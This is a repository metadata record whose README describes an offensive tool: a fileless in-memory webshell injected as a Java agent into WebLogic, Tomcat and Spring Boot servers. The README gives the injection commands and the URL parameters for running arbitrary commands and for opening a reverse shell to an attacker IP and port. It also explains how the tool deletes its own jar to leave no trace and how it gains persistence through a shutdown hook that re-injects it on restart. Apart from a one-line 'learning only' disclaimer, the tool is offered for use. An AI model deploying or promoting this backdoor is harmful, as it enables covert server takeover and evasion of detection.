{"id":13843345,"url":"https://github.com/keven1z/weblogic_memshell","last_synced_at":"2025-07-11T18:31:47.449Z","repository":{"id":40552905,"uuid":"313489690","full_name":"keven1z/weblogic_memshell","owner":"keven1z","description":"Fileless in-memory webshell (memshell) for weblogic and Tomcat","archived":false,"fork":false,"pushed_at":"2022-03-04T10:09:06.000Z","size":458,"stargazers_count":264,"open_issues_count":0,"forks_count":25,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-08-05T17:37:06.419Z","etag":null,"topics":["java","memshell","tomcat","weblogic"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/keven1z.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-11-17T02:53:15.000Z","updated_at":"2024-07-25T15:04:21.000Z","dependencies_parsed_at":"2022-08-09T23:00:37.437Z","dependency_job_id":null,"html_url":"https://github.com/keven1z/weblogic_memshell","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/keven1z%2Fweblogic_memshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/keven1z","download_url":"https://codeload.github.com/keven1z/weblogic_memshell/tar.gz/refs/heads/master","host":{"name":"GitHu
b","url":"https://github.com","kind":"github","repositories_count":225745588,"owners_count":17517674,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["java","memshell","tomcat","weblogic"],"created_at":"2024-08-04T17:02:00.110Z","updated_at":"2024-11-21T14:31:06.054Z","avatar_url":"https://github.com/keven1z.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"# Description\nA fileless (nothing written to disk) javaagent based on `javaagent` + `ASM`, compatible with multiple containers (weblogic, Tomcat, Springboot).\n\n# inject JDK requirements\n* Java 8\n\n# agent JDK requirements\n* Java 6-11\n\n# Compatible versions\n* weblogic 10.3.6\n* weblogic 12.2.1.2\n* weblogic 12.2.1.3\n* weblogic 12.1.3.0\n* Tomcat 8.5.61\n* Spring boot\n\n# Tested platforms\n* macos 10.0+\n* centos 7.1\n* windows 10\n* windows 11\n\n# Usage\n## inject parameters\n```shell\njava -jar inject.jar [your_password]  # general run\njava -jar inject.jar -p               # print the names of all running Java processes\njava -jar inject.jar [your_password] [process_name] # inject specifically into [process_name]\n```\n## Request parameters\n\n```text\nany url?psw =[your_password]\u0026cmd=[your_cmd]  execute an arbitrary command\nany url?psw =[your_password]\u0026ip=[attack_ip]\u0026port=[attack_port] reverse shell\n```\n\n# Test case\nRun `java -jar inject-1.0.jar x1001`\n![java](./img/java.png)\nOn the server side you can see the following, which indicates that the injection succeeded and that the current jar has been deleted, leaving no shell file on disk:\n![server](./img/server.png)\nRequest any URL with the parameters `psw=your_password\u0026cmd=your_cmd`\n![request](./img/request.png)\nWhen the application shuts down, the attack jar is automatically regenerated in the Java virtual machine directory.\n![persist](./img/persist.png)\nOn the next start it is injected automatically, achieving persistence.\n![persist2](./img/persist2.png)\n\n\u003e Testing shows that killing the container process with `kill -9` or a `forced process termination` does not trigger `addShutdownHook`, so persistence does not happen.\n\u003e The following process-termination cases were found online:\n\u003e* All threads have finished executing (√)\n\u003e* 
System.exit() is called (√)\n\u003e* The user presses Ctrl+C (√)\n\u003e* Abnormal exit caused by an error (√)\n\u003e* Process killed with kill -9 (×)\n\n# Updates\n## 2021/06/19\n* Changed the hook point to `javax/servlet/FilterChain` so that it is also compatible with tomcat.\n* With the memshell injected into weblogic, you can now request any URL with the password and command\n\n## 2021/12/02\n* Simplified the hook flow\n* Removed most print output\n* inject.jar can now target a custom process to hook\n* Added reverse shell\n\n# References\nhttps://github.com/rebeyond/memShell\n\n# Disclaimer\nThis project is for learning purposes only; do not use it for anything else\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkeven1z%2Fweblogic_memshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkeven1z%2Fweblogic_memshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkeven1z%2Fweblogic_memshell/lists"}